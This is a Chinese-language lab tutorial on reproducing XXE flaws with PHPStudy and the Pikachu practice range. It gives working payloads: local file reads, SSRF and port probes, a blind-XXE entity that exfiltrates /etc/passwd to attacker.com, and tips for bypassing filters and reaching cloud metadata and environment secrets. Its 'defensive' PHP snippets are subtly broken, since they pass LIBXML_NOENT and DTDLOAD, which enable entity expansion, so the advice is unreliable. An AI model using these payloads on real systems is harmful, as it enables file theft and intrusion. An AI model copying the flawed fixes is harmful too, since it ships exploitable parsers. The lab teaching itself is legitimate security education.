从靶场到实战：手把手教你用PHPStudy复现XXE漏洞（附Pikachu靶场环境）

从零构建XXE漏洞实验环境：PHPStudy与Pikachu靶场实战指南

在网络安全领域，理论知识固然重要，但真正的技能提升往往来自于动手实践。XXE（XML External Entity Injection）漏洞作为Web安全中的常见威胁，其原理理解与实际复现之间存在着一道难以跨越的鸿沟——环境搭建。本文将带你使用PHPStudy这款轻量级工具，配合经典的Pikachu漏洞靶场，构建一个完整的XXE漏洞学习环境。

1. 实验环境准备与基础配置

1.1 PHPStudy的安装与初始化

PHPStudy作为一款集成化的PHP开发环境，其优势在于一键部署和灵活配置。首先从官网下载最新版本的PHPStudy（当前推荐v8.1版本），安装过程只需注意以下几点：

• 安装路径避免中文和空格
• 安装完成后检查80端口是否被占用
• 首次启动时选择适合的PHP版本（推荐PHP5.4+）

# 检查端口占用情况（Windows） netstat -ano | findstr :80 # 如果端口被占用，可以修改Apache监听端口 # 找到phpStudy目录下的Apache/conf/httpd.conf # 修改Listen 80为其他端口如8080

安装完成后，通过浏览器访问http://localhost（或你设置的端口）应该能看到PHPStudy的欢迎页面。此时基础Web服务已经就绪，接下来我们需要配置一个专门的靶场环境。

1.2 Pikachu靶场部署

Pikachu是一个开源的漏洞练习平台，包含了多种常见Web漏洞的演示环境。下载Pikachu的最新版本后，将其解压到PHPStudy的WWW目录下，形成如下结构：

phpStudy/ └── WWW/ └── pikachu/ ├── inc/ ├── pkxss/ ├── sql/ └── xxe/

部署完成后，还需要初始化数据库：

1. 访问http://localhost/pikachu会提示数据库配置
2. 使用PHPStudy自带的MySQL管理工具创建新数据库pikachu
3. 导入Pikachu提供的SQL文件（通常位于/pikachu/pikachu.sql）
4. 修改/pikachu/inc/config.inc.php中的数据库连接信息

注意：如果遇到数据库连接问题，检查MySQL服务是否启动，以及config.inc.php中的密码是否与PHPStudy的MySQL密码一致（默认为root/root）

2. XXE漏洞原理深度解析

2.1 XML与外部实体基础

XML（可扩展标记语言）在设计之初就包含了实体引用的概念，这原本是为了提高文档的复用性和模块化。一个典型的XML文档结构如下：

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY author "John Doe"> ]> <note> <to>Alice</to> <from>&author;</from> <body>Don't forget the meeting!</body> </note>

在这个例子中，&author;会被解析为"John Doe"。问题出现在当实体可以引用外部资源时：

<!ENTITY xxe SYSTEM "file:///etc/passwd">

如果XML解析器配置不当，攻击者就能通过这种方式读取服务器上的任意文件。

2.2 PHP中的XXE风险点

PHP中有多个XML解析库容易受到XXE攻击，主要包括：

在PHP 5.3.4之前，甚至可以通过expect://协议执行系统命令。虽然新版PHP已经修复了这个问题，但文件读取的风险依然存在。

3. Pikachu靶场中的XXE实战

3.1 靶场环境分析

Pikachu靶场的XXE模块位于/pikachu/vul/xxe目录下，主要包含两个文件：

• xxe_1.php：基础的XXE漏洞演示
• xxe_2.php：带过滤的XXE挑战

我们先分析xxe_1.php的关键代码：

$xml = $_POST['xml']; $data = simplexml_load_string($xml); echo $data->name;

这段代码直接使用用户输入的XML数据，没有任何过滤措施，是典型的XXE漏洞。

3.2 基础XXE利用

使用Burp Suite或Postman构造以下请求：

POST /pikachu/vul/xxe/xxe_1.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded xml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%3C!DOCTYPE+xxe+%5B%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2FC%3A%2FWindows%2Fwin.ini%22%3E%5D%3E%3Croot%3E%3Cname%3E%26xxe%3B%3C%2Fname%3E%3C%2Froot%3E

解码后的XML payload为：

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <root> <name>&xxe;</name> </root>

服务器响应将包含win.ini文件的内容，证明XXE漏洞利用成功。

3.3 进阶利用技巧

除了文件读取，XXE还可以用于：

1. SSRF（服务器端请求伪造）：

   <!ENTITY xxe SYSTEM "http://internal.server/secret.txt">

2. 端口扫描（通过响应时间判断端口开放情况）：

   <!ENTITY xxe SYSTEM "http://target:22">

3. 盲XXE（当响应不直接显示时）：

   <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>"> %eval; %exfil;

重要提示：这些技术仅限在授权的测试环境中使用，未经授权的测试可能违反法律

4. 防御措施与安全配置

4.1 PHP层面的防护

针对不同的XML解析器，防护措施有所差异：

SimpleXML防护方案：

libxml_disable_entity_loader(true); $data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

DOMDocument防护方案：

$dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);

通用最佳实践：

• 升级到PHP 8.0+（默认禁用外部实体）
• 使用白名单验证XML输入
• 禁用不必要的协议（如file://、phar://）

4.2 Web服务器配置

在Apache的httpd.conf中添加：

<IfModule mod_php5.c> php_flag allow_url_fopen Off php_flag allow_url_include Off </IfModule>

对于Nginx，可以在php-fpm配置中添加：

php_admin_value[allow_url_fopen] = Off php_admin_value[allow_url_include] = Off

4.3 靶场环境的安全隔离

为了确保实验环境不会影响真实系统，建议采取以下措施：

1. 使用虚拟机或容器隔离环境
2. 限制PHPStudy的目录访问权限
3. 定期备份重要数据
4. 实验结束后及时关闭服务

# Windows下设置目录权限（管理员权限运行） icacls "C:\phpStudy\WWW\pikachu" /grant "Users":(OI)(CI)R

5. 从靶场到实战的思维转变

在真实渗透测试中，XXE漏洞的发现和利用比靶场环境复杂得多。以下是一些实战经验：

1. 入口点识别：

   • 查找接受XML输入的功能点（如API接口、文件上传）
   • 尝试修改Content-Type为application/xml
   • 测试SOAP服务端点

2. 绕过技巧：

   • 当file://被过滤时，尝试php://filter/convert.base64-encode/resource=/etc/passwd
   • 使用UTF-16编码绕过某些过滤器
   • 尝试SVG文件中的XXE（当允许上传SVG时）

3. 影响最大化：

   • 尝试读取/proc/self/environ获取环境变量
   • 查找AWS元数据端点（http://169.254.169.254）
   • 读取配置文件寻找数据库凭证

在最近的一次授权测试中，我们通过修改一个看似无害的Excel文件上传功能（实际解析为XML），成功获取了服务器上的敏感配置文件。这再次证明了XXE漏洞在实际环境中的危险性。